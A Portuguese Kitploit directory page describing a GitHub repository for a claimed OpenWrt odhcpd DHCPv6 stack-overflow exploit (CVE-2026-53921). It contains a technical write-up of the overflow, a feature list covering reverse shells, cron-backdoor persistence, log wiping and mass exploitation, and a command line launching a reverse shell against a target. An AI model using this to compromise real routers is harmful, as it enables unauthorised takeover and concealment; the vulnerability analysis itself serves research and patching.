Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – Estouro de Pilha (Stack Overflow) do odhcpd (CVSS 9.8) 🛡️ Write-Up detalhado e abrangente da vulnerabilidade, Verificador e Multi-exploit para RCE via DHCPv6 no OpenWrt. Overflow de vetor duplo (IA_NA/IA_PD) com shellcode MIPS/ARM, cadeias ROP, proxy SOCKS5, persistência, limpeza de logs e varredura em massa. Use com Ética, Permaneça Dentro da Lei. 🔒 | Kitploit
Ferramentas/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
Segurança de Sistemas EmbarcadosReconhecimentoFrameworks de ExploraçãoSegurança IoTAnálise de VulnerabilidadesExploraçãoPós-ExploraçãoRed TeamingGeração de Shellcode

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

CVE-2026-53921 – Estouro de Pilha (Stack Overflow) do odhcpd (CVSS 9.8) 🛡️ Write-Up detalhado e abrangente da vulnerabilidade, Verificador e Multi-exploit para RCE via DHCPv6 no OpenWrt. Overflow de vetor duplo (IA_NA/IA_PD) com shellcode MIPS/ARM, cadeias ROP, proxy SOCKS5, persistência, limpeza de logs e varredura em massa. Use com Ética, Permaneça Dentro da Lei. 🔒

Desenvolvimento de Payloads
Exploração de Binários
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

Ver Repositório
6124há 2 mesesAinda não revisado
Compartilhar

CVE-2026-53921

CVE-2026-53921 – Estouro de Pilha no odhcpd

CVE CVSS OpenWrt

⚠️ Apenas para fins educacionais e testes autorizados. O uso não autorizado é ilegal.


📖 Visão Geral da Vulnerabilidade

CVE-2026-53921 é um estouro de buffer de pilha crítico no daemon odhcpd do OpenWrt – o servidor DHCPv6/DHCPv4/RA padrão.

🔍 Como funciona

A vulnerabilidade existe no código de manipulação de mensagens DHCPv6 do odhcpd, especificamente nas funções build_ia() e dhcpv6_ia_handle_IAs().

Análise Técnica Aprofundada

1. A Causa Raiz

O bug ocorre durante a serialização (empacotamento) de pacotes de Resposta DHCPv6. Quando o odhcpd responde a solicitações de clientes, ele constrói a resposta em um buffer de pilha de tamanho fixo de 512 bytes sem a devida verificação de limites.

// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. Acionando o Estouro

Um atacante envia um DHCPv6 Request (ou Solicit) com:

  • 5 ou mais opções IA_NA (Identity Association for Non-temporary Address), cada uma contendo uma sub-opção IAAddress.
  • 22 ou mais opções IA_PD (Identity Association for Prefix Delegation).

Cada opção consome espaço na pilha enquanto o odhcpd constrói sua Resposta. Os dados acumulados excedem 512 bytes, causando o estouro.

3. Dois Vetores de Estouro


Vector Trigger Overflow Point


Site 1 5 opções IA_NA build_ia() para IA_NA com endereços IPv6

Site 2 22 opções IA_PD build_ia() para IA_PD

A causa raiz é idêntica, mas o estouro ocorre em caminhos de código diferentes, tornando ambos os vetores igualmente exploráveis.

4. Layout da Memória

Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

O atacante sobrescreve o endereço de retorno salvo para apontar para o seu shellcode na memória.

5. Requisitos de Exploração


Requisito Descrição


Acesso à Rede O atacante deve ter conectividade IPv6 com o alvo

Autenticação Nenhuma -- ataque não autenticado

Privilégios odhcpd executa como root, então o RCE concede controle total do sistema

Serviço Alvo A porta UDP 547 (DHCPv6) deve estar aberta

6. Posicionamento do Shellcode

Em um exploit real, o shellcode do atacante é colocado nos campos de endereço IPv6 do IAAddress (16 bytes por IA_NA). Os pacotes forjados empacotam o shellcode, o NOP sled e o endereço de retorno nesses campos.

Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. Cadeia de Impacto

Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. Vetores de Ataque vs. Status de Mitigação

Versão Status RCE Possível?


odhcpd < e432dd6 Vulnerável ✅ Sim OpenWrt < 24.10.8 Vulnerável ✅ Sim OpenWrt < 25.12.5 Vulnerável ✅ Sim OpenWrt 24.10.8+ Corrigido ❌ Não OpenWrt 25.12.5+ Corrigido ❌ Não odhcpd master + e432dd6 Corrigido ❌ Não

9. Exploração no Mundo Real

Esta vulnerabilidade é particularmente perigosa porque:

  • O odhcpd está habilitado por padrão nas instalações do OpenWrt.
  • Nenhuma autenticação é necessária---qualquer dispositivo no mesmo segmento IPv6 pode atacar.
  • O bug está no caminho de processamento de solicitações.
  • Stack canaries e ASLR raramente estão presentes em dispositivos MIPS/ARM embarcados.
  • O exploit pode contornar defesas comuns em muitos ambientes embarcados.

🎯 Versões Afetadas

ComponenteVersões vulneráveisCorrigido em
odhcpd (branch master)antes do commit e432dd6e432dd6 ou posterior
Lançamentos do OpenWrt< 24.10.8
< 25.12.5
24.10.8 & 25.12.5

🧰 Ferramentas

Este repositório fornece dois scripts independentes:

ScriptObjetivoCódigo de exploitSegurança
verifier.pyVerificação de vulnerabilidade não intrusiva❌ Não✅ Seguro
exploit.pyExploit completo armado✅ Sim⚠️ Perigoso

🔎 verifier.py – Verificador de Vulnerabilidade

  • Envia um Solicit DHCPv6 padrão para verificar se o serviço está ativo.
  • Lê banners HTTP/SSH para detectar a versão do OpenWrt.
  • Compara a versão com a faixa vulnerável conhecida.
  • Não envia nenhum payload de estouro ou shellcode.

💥 exploit.py – Exploit Completo

  • Vetores de estouro duplos: IA_NA (Site1) e IA_PD (Site2).
  • Detecção automática de arquitetura (MIPS / ARM).
  • Shellcode reverse e bind para MIPS big-endian.
  • Suporte a proxy SOCKS5.
  • Persistência (backdoor via cron) e limpeza de logs.
  • Varredura com threads e exploração em massa.
  • Codificação opcional de payload (XOR).

🚀 Instalação

git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 Uso

🔍 Verificador – verifica se um alvo é vulnerável

sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 Exploit – obter uma reverse shell (não use para atividades ilegais, apenas teste avançado)

sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ Opções de Linha de Comando

verifier.py

ArgumentoDescrição
-u, --targetEndereço IPv6 do alvo (obrigatório)
-i, --ifaceInterface de rede (padrão: eth0)

exploit.py

Baixar ferramenta